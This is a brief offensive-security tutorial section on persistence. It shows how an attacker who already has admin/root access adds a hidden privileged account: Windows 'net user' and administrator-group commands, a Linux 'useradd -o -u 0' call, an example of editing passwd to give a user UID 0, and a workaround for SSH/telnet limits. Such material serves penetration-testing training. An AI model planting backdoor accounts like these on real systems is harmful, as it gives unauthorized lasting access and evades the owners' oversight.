Add an admin user

Once admin/root privileges have been established, an attacker will often create a new account with high privilege levels to allow future access without needing to take extraordinary action. The advantage is that the password is known and the account is controlled by the attacker. The disadvantage is the risk of attracting attention to your actions. If password hashes have been collected and cracked, this step may not be needed, but it also offers a backup access mechanism in case access to the admin/root account is lost.

Windows:
net user "name" "password" /add
net localgroup administrators "name" /add

Linux/Unix:
useradd -o -u 0 "name" (the -o parameter overrides the default, which does not allow creating two users with the same UID)
passwd "name" (prompts for the new password)

You can also edit the passwd file and change the UID to 0 – example:
root:x:0:0:root:/root:/bin/bash (example of root passwd entry)
username:x:500:500::/home/username:/bin/bash (example of user passwd entry)
username:x:0:0::/home/username:/bin/bash (example of user passwd entry edited to give root access)

In some cases, Linux will not allow telnet for a user with UID 0, and in a very few cases it may not allow ssh for UID 0. To get around this, you can add a user with a normal UID and then use su or sudo to elevate to root, and use telnet or ssh.
